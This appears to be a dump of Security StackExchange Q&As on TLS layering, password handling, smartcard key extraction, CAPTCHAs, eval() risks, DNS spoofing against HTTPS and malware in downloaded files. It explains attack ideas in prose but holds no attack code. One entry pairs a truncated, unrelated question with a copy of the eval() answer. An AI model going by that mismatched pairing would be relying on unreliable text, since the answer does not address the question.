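# Sender computes and attaches the tag.
tag = hmac.new(key, message, hashlib.sha256).digest()

# Recipient recomputes the tag over the received message and compares.
expected = hmac.new(key, message, hashlib.sha256).digest()
print("authentic (unmodified AND from a key holder):",
      hmac.compare_digest(tag, expected))
```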
{ "source": [ "https://security.stackexchange.com/questions/93322", "https://security.stackexchange.com", "https://security.stackexchange.com/users/70088/" ] }
93,333
TLS stands for "transport layer security". And the list of IP protocol numbers includes "TLSP" as "Transport Layer Security Protocol". These two things would lead me to believe that TLS is a transport layer protocol. However, most people seem to talk about TLS over TCP, and Wikipedia lists it as an "application layer" protocol. This is further complicated by the fact that TCP doesn't have anything like a protocol number field: it just packages up raw bytes, so how do you parse out that you are getting a TLS packet, vs. a packet that just happens to start with 0x14 - 0x18 or equivalent?
The OSI model, which categorizes communication protocols into successive layers, is just that: a model. It is an attempt at pushing a physical reality into neatly defined, labelled boxes. Nobody ever guaranteed that it works... Historically, that model was built and published when the ISO was pushing for adoption of its own network protocols. They lost. The World, as a whole, preferred to use the much simpler TCP/IP. The "model" survived the death of its initial ecosystem, and many people have tried to apply it to TCP/IP. It is even commonly taught that way. However, the model does not match TCP/IP well. Some things don't fit in the layers, and SSL/TLS is one of them. If you look at the protocol details: SSL/TLS uses an underlying transport medium that provides a bidirectional stream of bytes. That would put it somewhere above layer 4. SSL/TLS organizes data as records, which may contain, in particular, handshake messages. Handshake messages look like layer 5. This would put SSL/TLS at layer 6 or 7. However, what SSL/TLS conveys is "application data", which is, in fact, a bidirectional stream of bytes. Applications that use SSL/TLS really use it as a transport protocol. They then use their own data representation and messages and semantics within that "application data". Therefore, SSL/TLS cannot be, in the OSI model, beyond layer 4. Thus, in the OSI model, SSL/TLS must be in layer 6 or 7, and, at the same time, in layer 4 or below. The conclusion is inescapable: the OSI model does not work with SSL/TLS. TLS is not in any layer. (This does not prevent some people from arbitrarily pushing TLS in a layer. Since it has no practical impact -- this is just a model -- you can conceptually declare that TLS is layer 2, 5, or 17; it won't be proven false.)
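On the question's last point (how a receiver knows it is getting TLS at all): TCP itself carries no protocol identifier, so the endpoints simply agree, usually by convention of the port (e.g. 443), that the byte stream is TLS, and the receiver then parses it as the records mentioned above. A hedged sketch of reading the 5-byte record header (illustrative only; real stacks do far more validation than this):

```python
import struct

RECORD_TYPES = {20: "change_cipher_spec", 21: "alert", 22: "handshake",
                23: "application_data", 24: "heartbeat"}

def parse_tls_record_header(data: bytes):
    # content type (1 byte), version major/minor (2 bytes), payload length (2 bytes)
    ctype, major, minor, length = struct.unpack("!BBBH", data[:5])
    return RECORD_TYPES.get(ctype, "unknown"), (major, minor), length

# Header bytes of a TLS 1.2 handshake record (content type 0x16):
print(parse_tls_record_header(bytes([0x16, 0x03, 0x03, 0x00, 0x2f])))
# -> ('handshake', (3, 3), 47)
```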
{ "source": [ "https://security.stackexchange.com/questions/93333", "https://security.stackexchange.com", "https://security.stackexchange.com/users/80460/" ] }
93,395
I am migrating an old application which used MD5 hashing to Spring Security with BCrypt encoding of passwords. I want to encode the password on the new user creation page, the change password page and the login page before it is sent over the network. I know HTTPS can solve the problem, but I am still instructed to encode the password before sending it over the network as per our organizational guidelines. What would be the best way to hash the passwords using JavaScript? Just to explain it further, I am using the JCryption API for encrypting the password using AES, so the value transmitted over the network is AES(SHA1(MD5(plain password))); now I want to replace only the MD5 step with bcrypt. The rest of the setup remains unchanged. Will this approach work against a man-in-the-middle attack?
I know HTTPS can solve the problem, but I am still instructed to encode the password before sending it over network as per our organizational guidelines. This really defines your situation. Basically, you have a simple solution that you should use anyway (use HTTPS), if only because without HTTPS an active attacker could hijack the connection after the authentication step, regardless of any "encoding" and hashing you use for the password (an attacker who is in position to do a Man-in-the-Middle attack will succeed regardless of how much you ritually dance with hash functions and encryption). Then, you also have a guideline that is both idiotic, and administratively unavoidable. Your problem is then: how can you do things properly, and still comply with the "guideline" ? Note that the guideline makes little sense at several levels. Not only does the lack of SSL makes the protocol vulnerable to hijack; but also any kind of "encoding" does nothing good against passive attackers either. The reason is that if the protocol is "the client shows the 'encoded' password" then a passive eavesdropper will simply look at that "encoded password" and send it himself -- thus, that kind of encoding does not actually improve security in any way. It just makes some people feel more secure because they understand cryptography as some kind of barbecue sauce ("the more we sprinkle everywhere the better it gets"). What I suggest is that you do the following: First, try to sell the idea that "HTTPS" incarnates the 'encoding'. In other words, by sending the password inside a SSL tunnel, you are already complying with the guideline, since the password is duly encoded (and, really, encrypted ), along with the rest of the data. If the stupidity infestation is more serious and some auditor (let's call him Bob) still throws a fit about your lack of "encoding" then try applying some reversible encoding on the client side. E.g. before sending the password, apply Base64 . This means that if the password is "bobsucks", what will be sent (within the SSL, of course) will be "Ym9ic3Vja3M=", and Bob will be happier, because the latter string is obviously a lot more secure. The important point here is that since the requirement does not make sense, the solution won't make much sense either.
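For completeness, and to underline that such "encoding" adds no secrecy whatsoever: Base64 is trivially reversible, as this tiny sketch (my illustration, not part of the original answer) shows.

```python
import base64

encoded = base64.b64encode(b"bobsucks").decode()   # 'Ym9ic3Vja3M='
decoded = base64.b64decode(encoded)                # b'bobsucks' again
print(encoded, decoded)
```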
{ "source": [ "https://security.stackexchange.com/questions/93395", "https://security.stackexchange.com", "https://security.stackexchange.com/users/77043/" ] }
93,399
A number of crypto-dongles make the claim that it is impossible to extract the stored private key once written. Yubico : The YubiKey AES Key information can never be extracted from a YubiKey device – only programmed to it. Nitrokey : Other than ordinary software solutions, the secret keys are always stored securely inside the Nitrokey. Their extraction is impossible which makes Nitrokey immune to computer viruses and Trojan horses. The claim as literally stated seems like marketing nonsense. The dongle itself has access to the private key so somehow it can be read. Still, it's an interesting claim. The choice of words -- "never", "always", "impossible" -- suggest that there is something that can be proven here. Or maybe I'm giving them too much credit. Is there anything to this? What is it? My guess is that they mean it's impossible to extract the private key without physically tampering with the crypto-dongle. It seems plausible that one could show that there simply is no physical channel for relaying the private key outside of the device. That complicates writing the key and I can't see how that could be solved. One way I could see is to not write the key verbatim but somehow allow it to be randomized, but I believe these devices actually allow writing the key. Or maybe there's more substance to it than that. For all I know theses devices uses some exotic mechanism for storing bits that really can't be read directly without destroying the device. I did find an answer here suggesting there is some real meat to this but it doesn't go into detail. https://security.stackexchange.com/a/92796/45880 Extracting private keys directly from the card is nearly impossible. With some acid package destruction and electron microscope work, a skilled team, and enough time, money, and luck you can in theory extract keys but it involves not only physical access but a scenario where the card will be physically destroyed.
Well "impossible" is impossible to prove which is why in the linked answer I said "almost impossible", maybe even that is overstating it. By using a secure hardware device the attack vector goes from "malware installed remotely on host steals secret," to "attacker needs to physically gain access to the hardware device and destructively remove the private key." The latter is certainly not impossible, but it is a lot more difficult. Those usb dongles work very similar to smartcards. I have more experience with smartcards so I will use that in the answer but most of the same principles apply. In fact many of those usb dongles use a smart card SoC internally. They are cheap, programmable, and offer robust security so in many applications it makes sense to just use a smartcard internally rather than try to build something new. A programmable smartcard is a complete computer in a single chip, or system on a chip (SoC). Now it is a very limited computer but still a computer. The connection to the "outside world" for the smartcard is a low privilege simple serial interface. The card gets a command (more like a request) from the host and the card responds with a response. The commands are limited to what the card has been programmed to do. So if we have a smart card programmed to digitally sign an instruction (like a payment request in credit card EMV), the host will send a request over the serial interface to the card consisting of a command and some inputs. The card parsed the command and assuming it is valid it sends back a digital signature to the host over the same interface. In many ways it resembles a client-server relationship with the smartcard being the server and the host system being the client. The private key never leaves the card during the process. It is just request in, response out. The host has no mechanism to force the smartcard to return the private key or do anything it wasn't programmed to do. Of course this assumes there is no "please give me all the private keys" command which would obviously be pointless and provide no security. The smartcard may have a user assigned PIN and the PIN is part of the command format. The smartcard verifies the PIN and if it is invalid will reject the command. It has its own internal memory so it may record internally the number of invalid attempts and be programmed to shutdown (or in extreme cases erase the card). The programming (flashing) of a smartcard is done prior to shipping. Of course if an attacker could just reprogram the smartcard to run a "give me all your keys" program it wouldn't be secure so most cards employ some sort of security bit in write once memory. So the card is programmed and the write bit set. The card will then reject any future attempts to reprogram. Try not to get hung up on a smartcard doing exactly this. They are programmable devices so they will vary in implementation but the general concept is you have this self contained computer with its own internal secure storage which has been programmed to respond to requests from a host over a simple low permission interface. I do agree the word "impossible" is marketing but it isn't that far from the truth. You could say practically impossible. The very basic design and locked functionality means you end up with a hardened device that is difficult to attack. However the old axiom " there is no information security without physical security " still applies. The private key is still physically in the smartcard. 
With physical access and enough motivation you can pretty much "unsecret" any secret. As in the linked example, the smartcard can be bypassed and the key read out directly off the physical memory. A common method is to take the card, remove the SoC and use acid deconstruction to burn away the package. Using an electron microscope and enough skill you could locate the spot on the silicon which stores the keys, connect leads and read them out. It has been done, so it definitely is not impossible, but in most cases that isn't the type of attack or attacker we are trying to defend against. Honestly, if your attacker would go to that level, I would be more worried about a $5 wrench.
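To make the request/response model described above a little more concrete, here is a rough software analogy (my addition, and only an analogy: a real card enforces this in tamper-resistant hardware, not in Python). The host only ever calls sign(); the private key object is created inside the "card" and is never returned.

```python
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding

class ToySmartCard:
    """Illustrative stand-in for a signing-only token."""
    def __init__(self, pin: str):
        self._pin = pin
        self._bad_tries = 0
        # Key is generated inside the "card" and never exposed.
        self._key = rsa.generate_private_key(public_exponent=65537, key_size=2048)

    def sign(self, pin: str, message: bytes) -> bytes:
        if self._bad_tries >= 3:
            raise RuntimeError("card locked")
        if pin != self._pin:
            self._bad_tries += 1
            raise ValueError("wrong PIN")
        self._bad_tries = 0
        return self._key.sign(message, padding.PKCS1v15(), hashes.SHA256())

card = ToySmartCard(pin="1234")
signature = card.sign("1234", b"payment request #42")  # response out, key stays inside
```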
{ "source": [ "https://security.stackexchange.com/questions/93399", "https://security.stackexchange.com", "https://security.stackexchange.com/users/45880/" ] }
93,611
TLDR: We already require two-factor authentication for some users. I'm hashing, salting, and doing things to encourage long passphrases. I'm not interested in the merits of password complexity rules in general. Some of this is required by law, and some of it is required by the customer. My question is fairly narrow: Should I detect leetspeak passwords such as Tr0ub4dor&3 as being a dictionary word, and therefore fail passwords that primarily consist of a single dictionary word (even if leeted). Multiple word passphrases are always accepted regardless if leeted or not, this is only a question about those who choose to use more traditional short passwords. I am the lead developer for an upcoming government website which will expose sensitive personal information (criminal history, SSNs , etc. primarily). The website will be consumed by the general public, for doing background checks on employees, etc. On the backend, I'm storing the passwords hashed with PBKDF2 salted on a per-user basis with very high iterations, so brute force hashing attacks against stronger passwords are not realistic (currently), and the website locks the user out for 10 min after five bad tries, so you can't brute force really that way either. I'm getting some pushback from my customers/partners about the severity of the password rules I have implemented. Obviously I want people to use 16-20+ char passphrases, but this is a slow-moving bureaucracy. So in addition to allowing/encouraging those good passwords, I have to allow some shorter "hard" passwords. I'm just trying to limit our exposure. In particular, the "no dictionary word" requirement is causing people frustration, as I disallow the classic leetspeak passwords such as XKCD's famous Tr0ub4dor&3 . (For those curious, I run the proposed password through a leetspeak permutation translator (including dropping the char) and then compare each permutation against a dictionary) Am I being too severe? I am a big proponent of "Avids rule of usability" - Security at the expense of usability comes at the expense of security. But in this case, I think it's more an issue of habit/education. I allow diceware/readable passphrase passwords with no restrictions, only the "normal" passwords get stronger requirements. XKCD #936: Short complex password, or long dictionary passphrase? Should I try to solve this with just better UI help? Should I stick to my guns? The multiple recent high-profile hacks, especially ones that exposed passwords makes me think I'm in the right, but I also don't want to make things stupid for no reason. Since I'm protected from brute force attacks fairly well (I think/hope), is this unnecessary complexity? Or just good defense in depth? For those that can't grok passphrases or truly random passwords, the "two words plus num/symbols" passwords seem to be both easy enough, and at least harder to hack, if I can get people to read the instructions... Ideas: Better password hints/displayed more prominently (too subjective?) Better strength meter (something based on zxcvbn? - would fail the dictionary words on the client-side rather than after a submit) Disallow all "short" passwords, force people to use only passphrases, which makes the rules simpler? "make me a password" button that generates a passphrase for them and makes them copy it into the password fields Give up and let the leetspeek passwords through? 
Here's what I currently have in my password instructions/rules:
- 16 characters or longer passphrase (unlimited max), or
- At least eight characters
  - Contain three of the following:
    - UPPERCASE
    - lowercase
    - Numbers 0123456789
    - Symbols !@#$%^&*()_-+=,./<>?;:'"
  - Not based on a dictionary word
  - Not your username

Examples of passwords that won't be accepted:
- Troubador (Single dictionary word)
- Troubador&3 (Single dictionary word plus numbers and symbols)
- Tr0ub4dor&3 (Based on a single dictionary word)
- 12345678 (Does not contain 3/4 character types)
- abcdefgh (Does not contain 3/4 character types)
- ABCDEFGH (Does not contain 3/4 character types)
- ABCdefgh (Does not contain 3/4 character types)
- ABC@#$%! (Does not contain 3/4 character types)
- ab12CD (Too Short)

Examples of passwords that will be accepted (do not use any of these passwords):
- correct horse battery staple (Diceware password)
- should floating things fashion the mandate (Readable passphrase - link to makemeapassword.org)
- GoodPassword4! (multiple words, upper, lower, numbers, symbols)
- Yyqlzka6IAGMyoZPAGpP (random string using uppercase, lowercase, and numbers)
The mistake here would be to believe that extra password rules increase security. They do not. They increase user annoyance; and they make users choose passwords that are harder to memorize. For some weird psychological reason, most people believe that a password with non-letter symbols is "more secure" in some ontological way than a password with only letters. However, this is fully unsubstantiated. There is one "password rule" that is not harmful to security: a minimum password length. This is because of the combination of two things: The most stupid brute force attacks enumerate all sequences of symbols, starting with sequences of 1, then 2, and so on. In that sense, a password that contains only 4 symbols can be said to be irremediably weak. Users understand that notion of enumerating all small passwords. They are ready to accept that they need to type at least 6 or 7 letters. All the other rules will be, at best, neutral, but most of them will in fact decrease security, because they will induce users to: design and share with each other "methods" for generating passwords that your server will accept, methods which usually have a lot of punctuation characters but very little entropy; write down their passwords, which are hard to memorize; reuse passwords on other systems, for the same reason of difficult memorization. "Password strength meters" are also harmful, because: They are not, and cannot be, reliable. A password strength meter only measures how long a given password would stand against the exact brute force strategy incarnated by the meter code, but no attacker is constrained to follow the exact same strategy. Password strength meters cannot measure the entropy that prevailed in the password selection, since they only see the result (the password itself). They turn password selection into a game that encourages witty strategies on the part of the user, and wit is exactly what we do not want for passwords. Secure passwords strive on randomness . What can help a lot is to provide a password generation system. Take care to make that system optional : you want users to willingly use it, not to force it upon them, lest they would rebel (and write down passwords, and share, and reuse). So my recommendation would be: Reject passwords shorter than 7 characters (since you have a mitigation system against online attacks -- namely the autolock for 10 minutes after 5 wrong tries -- you can tolerate relatively short passwords). BUT NO OTHER RULE. Any sequence of 7 or more characters is fine. Provide one or, even better, several optional password generation mechanisms, e.g. diceware, the "correct horse" thing, and so on. Encourage the use of password managers. If possible, try to find something else than passwords for authenticating users. My assertion is that you are pushing things in a somewhat skewed direction, not exactly the right one. In particular, password rules that insist on some specific characters are a bad thing (a common thing, but a bad thing nonetheless).
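A minimal sketch of the two points that do help, the length floor and an optional generator (my illustration, not part of the original answer; the word list here is a tiny placeholder, and a real deployment would use a full diceware list while keeping the secrets module for randomness):

```python
import secrets

WORDLIST = ["correct", "horse", "battery", "staple", "floating",
            "mandate", "lantern", "anchor", "orbit", "velvet"]  # placeholder list

def suggest_passphrase(n_words: int = 5) -> str:
    """Optional, server-offered suggestion; never forced on the user."""
    return " ".join(secrets.choice(WORDLIST) for _ in range(n_words))

def is_acceptable(password: str, min_len: int = 7) -> bool:
    """The only rule enforced: a minimum length. No other constraints."""
    return len(password) >= min_len

print(suggest_passphrase())
```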
{ "source": [ "https://security.stackexchange.com/questions/93611", "https://security.stackexchange.com", "https://security.stackexchange.com/users/69109/" ] }
93,884
The team of developers I am part of is trying to develop a safe way to exchange sensitive data between a server and mobile devices. We have come up with the following algorithm: Device generates private RSA key, and sends the public key to server. Server generates unique to user AES key and uses the RSA public key to encrypt it and send it back to device. Device gets the AES key. Uses it to encrypt password and username and sends it to the server. Server decrypts the username and password. If there is a match, the AES key is used for secure communication for X amount of time or until log-out. Else, the process must be restarted. Is it safe enough? Are there ways it can be improved? What are the faults? Edit: After reading the comments, what is a safer alternative and why? Edit2: Ok, i get it. I won't use my own implementation, will find something already tried and proven.
All of the weaknesses in your protocol can be summed up as "use SSL" or even "use SSL, dammit!". In more detail: The whole protocol is of course vulnerable to impersonation, specifically the double impersonation that is also known as a Man-in-the-Middle attack. Similarly, if any potential attacker who can eavesdrop on the line decides to modify the data in transit, then he can, and your client and server will be none the wiser. Experience shows that saying "encrypt all the data with that key" and then doing it correctly is awfully complex. SSL itself took almost 15 years to get that right, and many implementations are still not up to it. Padding oracles, predictable IVs, MAC verification timing, verified closure, protection against resequencing and replay of packets... As an overall assessment: don't do that.
{ "source": [ "https://security.stackexchange.com/questions/93884", "https://security.stackexchange.com", "https://security.stackexchange.com/users/80961/" ] }
93,912
I introduced reCAPTCHA on the login screen of a system. My goal was security: protecting against things like dictionary/bot attacks or other attacks of that type. The users now hate it; some did not even understand it, and I had to remove it. When I look around, I don't see many systems with a captcha on the login screen; it appears most of the time on other forms, like "contact us", or sometimes, as on Stack Exchange, when you want to post. It made me wonder: is it a good idea to have it on the login screen?
The way I've seen some large systems do it is to only require a captcha after sequential failed login attempts (ie: reset the count after a valid login). If you are worried about automated cracking, you could put the captcha at some high number of failures like 20, 50, 100 failed attempts. Almost no legitimate user will see the captcha, but an automated attack will get hit by it. Is it worth it to add this complexity? Security and UX are trade-offs. You need to find the correct trade-off for your risk profile.
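A bare-bones sketch of that counter logic (my illustration; the in-memory dict is a stand-in for whatever per-user storage or cache you actually use, and 20 is just one possible threshold):

```python
FAILED_LOGINS = {}            # username -> consecutive failures (placeholder storage)
CAPTCHA_THRESHOLD = 20

def needs_captcha(username: str) -> bool:
    return FAILED_LOGINS.get(username, 0) >= CAPTCHA_THRESHOLD

def record_attempt(username: str, success: bool) -> None:
    if success:
        FAILED_LOGINS.pop(username, None)   # reset the count after a valid login
    else:
        FAILED_LOGINS[username] = FAILED_LOGINS.get(username, 0) + 1
```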
{ "source": [ "https://security.stackexchange.com/questions/93912", "https://security.stackexchange.com", "https://security.stackexchange.com/users/54163/" ] }
94,017
Every time that someone mentions eval(), everyone says that there are "security issues" with it, but nobody ever goes into detail about what they are. Most modern browsers seem to be able to debug eval() just as well as normal code, and people's claims of a performance decrease are dubious/browser dependent. So, what are the issues, if any, associated with eval()? I haven't been able to come up with anything that could be exploited with eval() in JavaScript. (I do see issues with eval()'ing code on the server, but client-side eval() seems to be safe.)
eval() executes a string of characters as code. You use eval() precisely because the string contents are not known in advance, or even generated server-side; basically, you need eval() because the JavaScript itself will generate the string from data which is available only dynamically, in the client. Thus, eval() makes sense in situations where the JavaScript code will generate code. This is not intrinsically evil , but it is hard to do securely. Programming languages are designed to allow a human being to write instructions that a computer understands; to that effect, any language is full of small quirks and special behaviours that are supposed to help the human programmer (e.g. the automatic adding of ';' at the end of some statements in JavaScript). This is all nice and dandy for "normal" programming; but when you generate code from another program, based on data which may be potentially hostile (e.g. string excerpt from other site users), then you have to, as the developer for the code generator, know about all these quirks, and prevent hostile data to exploit them in damaging ways. In that sense, code generators (and thus eval() ) incur the same conceptual issues as raw SQL and its consequence, SQL injection attacks . Assembling at runtime an SQL request from externally provided parameters can be done securely, but this requires minding an awful lot of details, so the usual advice is not to do that. This relates to the usual conundrum of security, i.e. that it is not testable: you can test whether some piece of code works properly on correct data, but not that it never works improperly on incorrect data. Similarly, using eval() securely is possible, but it is so hard in practice that it is discouraged. All of this is said in all generality. In your specific context, eval() might be safe. However, it takes some effort to have a context safe for use of eval() , that actually needs eval() .
{ "source": [ "https://security.stackexchange.com/questions/94017", "https://security.stackexchange.com", "https://security.stackexchange.com/users/78741/" ] }
94,043
I'm just wondering I'm not a criminal but a friend is also wondering and Idk.
eval() executes a string of characters as code. You use eval() precisely because the string contents are not known in advance, or even generated server-side; basically, you need eval() because the JavaScript itself will generate the string from data which is available only dynamically, in the client. Thus, eval() makes sense in situations where the JavaScript code will generate code. This is not intrinsically evil , but it is hard to do securely. Programming languages are designed to allow a human being to write instructions that a computer understands; to that effect, any language is full of small quirks and special behaviours that are supposed to help the human programmer (e.g. the automatic adding of ';' at the end of some statements in JavaScript). This is all nice and dandy for "normal" programming; but when you generate code from another program, based on data which may be potentially hostile (e.g. string excerpt from other site users), then you have to, as the developer for the code generator, know about all these quirks, and prevent hostile data to exploit them in damaging ways. In that sense, code generators (and thus eval() ) incur the same conceptual issues as raw SQL and its consequence, SQL injection attacks . Assembling at runtime an SQL request from externally provided parameters can be done securely, but this requires minding an awful lot of details, so the usual advice is not to do that. This relates to the usual conundrum of security, i.e. that it is not testable: you can test whether some piece of code works properly on correct data, but not that it never works improperly on incorrect data. Similarly, using eval() securely is possible, but it is so hard in practice that it is discouraged. All of this is said in all generality. In your specific context, eval() might be safe. However, it takes some effort to have a context safe for use of eval() , that actually needs eval() .
{ "source": [ "https://security.stackexchange.com/questions/94043", "https://security.stackexchange.com", "https://security.stackexchange.com/users/81096/" ] }
94,095
I just ordered a cheap Comodo PositiveSSL Certificate via a UK reseller, and I was rather surprised to find that the following files were emailed to me automatically, in a zip file: Root CA Certificate - AddTrustExternalCARoot.crt Intermediate CA Certificate - COMODORSAAddTrustCA.crt Intermediate CA Certificate - COMODORSADomainValidationSecureServerCA.crt Your PositiveSSL Certificate - domain_name.crt Additionally the cert itself (the last file) is added in text form at the end of the email. It's for a site that does not need a lot of security - it does not handle credit cards or other highly confidential information. I set up a strong passphrase on the associated private key. Am I right in assuming this cert is useless without the private key and passphrase? Or, given that email can be considered compromised, would an attacker wishing to decrypt my site traffic be at an advantage if they have these files? I am minded to re-generate the certificate immediately, but I worry that Comodo will just "helpfully" send me a new zip file. I would much rather download all these files from the reseller's SSL website.
You are right assuming the certificate is useless without the private key, so sending it in the mail is no big security risk and is common practice actually. The certificate is supposed to be public, connecting to your website would also provide me with your certificate, so no need to hack your email there. edit When starting the connection the server sends the certificate which incorporates the public key. The client will generate a (symmetric) session key used for encrypting the rest of the communication and encrypt this with the public key. Now only the server with the corresponding private key can decrypt this session key and use it to decrypt and encrypt the following data. This way it doesn't matter if someone else has your certificate, as long as they don't have the private key belonging to it, they won't be able to decrypt the session key and won't be able to impersonate your server.
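A small sketch of why holding only the certificate is harmless (my addition, with assumptions: the file name comes from the question, the certificate is PEM-encoded and carries an RSA key, and the third-party cryptography package is used): anyone can use the certificate's public key to encrypt data to you, but only the never-emailed private key can decrypt it.

```python
from cryptography import x509
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import padding

with open("domain_name.crt", "rb") as f:        # assuming PEM encoding
    cert = x509.load_pem_x509_certificate(f.read())

# Anyone with the certificate can do this...
ciphertext = cert.public_key().encrypt(
    b"secret only the key holder can read",
    padding.OAEP(mgf=padding.MGF1(algorithm=hashes.SHA256()),
                 algorithm=hashes.SHA256(), label=None),
)
# ...but reversing it requires the private key, which was never sent by email.
```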
{ "source": [ "https://security.stackexchange.com/questions/94095", "https://security.stackexchange.com", "https://security.stackexchange.com/users/81142/" ] }
94,102
I have heard from different people and in different places that if I send an encrypted file to someone else, I should send them the password in a separate email; but why? If someone is sniffing, they will capture both and if the inbox is compromised, they will capture both. But apparently, it's "best practice" to send it separately. Now personally, I would send a password via other means, such as a phone call. What would you guys recommend?
There is added noise to the channel if you send them separately: assuming there is a delay in sending the second email, the attacker would have to listen for a longer period of time and filter more content. It is simply a little bit safer than sending everything in the same package; think of ordering a safe box and shipping the keys along with it; it's basically the same idea. You are right in thinking that sending the password via a different channel (SMS, phone, etc.) is more secure; however, it also requires more management and the collection of more information, and the logistics of doing it come with an added cost.
{ "source": [ "https://security.stackexchange.com/questions/94102", "https://security.stackexchange.com", "https://security.stackexchange.com/users/49043/" ] }
94,106
I've been thinking of a problem with usual password managers: although they do provide better security than manually using passwords, there's a central database that can get lost, get compromised, etc. For example, malware could use a keylogger to get your master password and then compromise all the passwords in the password file. Cloud-based solutions also raise the privacy issue of the cloud service knowing when exactly you access your passwords. And there's always the possibility that the cloud service keeps around an unencrypted copy of all your information. Or somebody bribes LastPass's developers with a million dollars to have LastPass send everything to the attacker, or something. More realistically, password managers seem to decrease security in the event of a targeted attack. I've had a random idea to have a stateless password manager that would basically operate by hashing together a username, the website domain (or some user-chosen site identifier), and the master password to generate the password for each account the user has. In this way, there's no database to be kept around, and it's possible for users to use their passwords on, e.g. public computers by, say, manually computing the hash using some online JavaScript hashing tool. This sounds pretty secure, but it also sounds pretty obvious, and usually if an obvious idea isn't a thing it's because there's some pitfall. Is there? Why don't password managers do this instead of storing everything in a big file?
One problem with this kind of solution where a predictable algorithm is used to generate a secret from a master password/phrase, is that if your master password is compromised directly (e.g. keylogger) or indirectly (e.g. an attacker with a password of yours generated through this system who can carry out a brute-force attack on it), the attacker has effectively compromised the security of all of your accounts, as they would be able to easily generate the passwords you use for all sites.
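For illustration, a stripped-down sketch of the scheme from the question (hypothetical parameters, not a recommendation), which also makes the single point of failure visible: whoever learns the master string can regenerate the password for every site.

```python
import hashlib

def site_password(master: str, domain: str, username: str) -> str:
    salt = f"{username}@{domain}".encode()
    digest = hashlib.pbkdf2_hmac("sha256", master.encode(), salt, 200_000)
    return digest.hex()[:20]   # arbitrary truncation for this sketch

pw = site_password("my master passphrase", "example.com", "alice")
# Compromise of "my master passphrase" compromises every derived password at once.
```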
{ "source": [ "https://security.stackexchange.com/questions/94106", "https://security.stackexchange.com", "https://security.stackexchange.com/users/20703/" ] }
94,221
I am soon to start my compulsory military service. I applied to the Cyber Warfare Unit of the Finnish army. There was a test for applicants. Since the test is done, the questions have now been published here: http://erityistehtavat.puolustusvoimat.fi/cyberchallenge.html Here is question 4: Two completely isolated programs get one random bit each from different hardware random number generators. After getting the bit each program guesses what the other program's random bit was. Programs can be different and use different strategies for guessing. After running them once, if at least one program guessed correctly, the author of the programs receives a prize. Is it possible to devise a strategy that provides a 100% chance of winning the prize? If yes, explain the strategy. I answered no because I couldn't figure out a winning strategy. Was that the right answer or did I miss something?
There is actually a solution that will always succeed: Program A will guess the opposite of the value it receives, program B will guess the same value as the one it receives. You can also think of that as such: A guesses that they will receive different numbers; B guesses they receive the same. One of them is bound to be correct. If you look at the following table (r for receive, g for guess), you will see that either A or B is always right (* denotes correct response):

rA | rB | gA  | gB
 0 |  0 |  1  |  0*
 0 |  1 |  1* |  1
 1 |  0 |  0* |  0
 1 |  1 |  0  |  1*
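You can also verify the strategy exhaustively; a tiny sketch (my addition) that checks all four cases:

```python
from itertools import product

def guess_a(bit_a: int) -> int:   # A guesses the opposite of its own bit
    return 1 - bit_a

def guess_b(bit_b: int) -> int:   # B guesses the same as its own bit
    return bit_b

assert all(guess_a(a) == b or guess_b(b) == a
           for a, b in product((0, 1), repeat=2))
print("In every case at least one program guesses correctly.")
```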
{ "source": [ "https://security.stackexchange.com/questions/94221", "https://security.stackexchange.com", "https://security.stackexchange.com/users/81234/" ] }
94,331
How does using SSL protect against DNS spoofing? DNS is at a lower level and it always works the same whether the user is visiting an HTTP or an HTTPS site.
Assume you managed to poison the DNS cache for securesite.com with an IP that you control. Now, when the client visits https://securesite.com, it will resolve to your IP address. As part of the SSL handshake process, your server will need to send a valid certificate for securesite.com which contains the public key. At this point, you have 2 options: 1) Send the legitimate certificate. This will check out since the certificate is signed by a trusted CA. The client will then encrypt the master secret using the public key. It breaks down at this point, because without the private key, you cannot decrypt the master secret and thus you can't finish the connection setup. 2) Send a self-signed certificate. However, since it is not signed by a trusted CA, a warning will show in the client's browser. If the client chooses to proceed anyway, then you have successfully carried out the attack. DNS spoofing will generally not work on HTTPS websites unless the client chooses to ignore the warning signs or if you manage to obtain the private key for the site.
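To see the same thing from the client side, here is a hedged sketch (my addition; 203.0.113.7 is a documentation-range placeholder standing in for the attacker-controlled IP): a properly validating TLS client refuses to continue unless the server presents a certificate valid for securesite.com and proves possession of the matching private key during the handshake.

```python
import socket
import ssl

ctx = ssl.create_default_context()   # CA validation and hostname checking enabled

with socket.create_connection(("203.0.113.7", 443), timeout=10) as raw:
    # Against an impostor this raises ssl.SSLCertVerificationError (untrusted or
    # mismatched certificate) or fails the handshake (stolen cert, no private key).
    with ctx.wrap_socket(raw, server_hostname="securesite.com") as tls:
        print(tls.getpeercert()["subject"])
```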
{ "source": [ "https://security.stackexchange.com/questions/94331", "https://security.stackexchange.com", "https://security.stackexchange.com/users/81301/" ] }
94,356
If a file is downloaded from the Internet and saved on disk, but is not opened by a user (if we keep autorun off), is there any chance that malicious code (e.g. a virus) in the file could trigger? I'm not asking about attacks that could be made while downloading, or when browsing to a site - imagine the file has somehow been stored on the disk with no attack taking place. What risk do I then face from malware?
There are a few cases where simply downloading a file without opening it could lead to execution of attacker controlled code from within the file. It usually involves exploiting a known vulnerability within a program which will handle the file in some way. Here are some examples, but other cases are sure to exist:
- The file targets a vulnerability in your antivirus which triggers when the file is scanned
- The file targets a vulnerability in your file system such as NTFS where the filename or another property could trigger the bug
- The file targets a bug which can be triggered when generating a file preview such as PDF or image thumbnail
- A library file (ex. dll) could get executed when saved to the same directory where an application vulnerable to binary planting is executed from
- The file is a special file that can change the configuration of a program such as downloading a .wgetrc file with wget on Linux
- …and more
{ "source": [ "https://security.stackexchange.com/questions/94356", "https://security.stackexchange.com", "https://security.stackexchange.com/users/81330/" ] }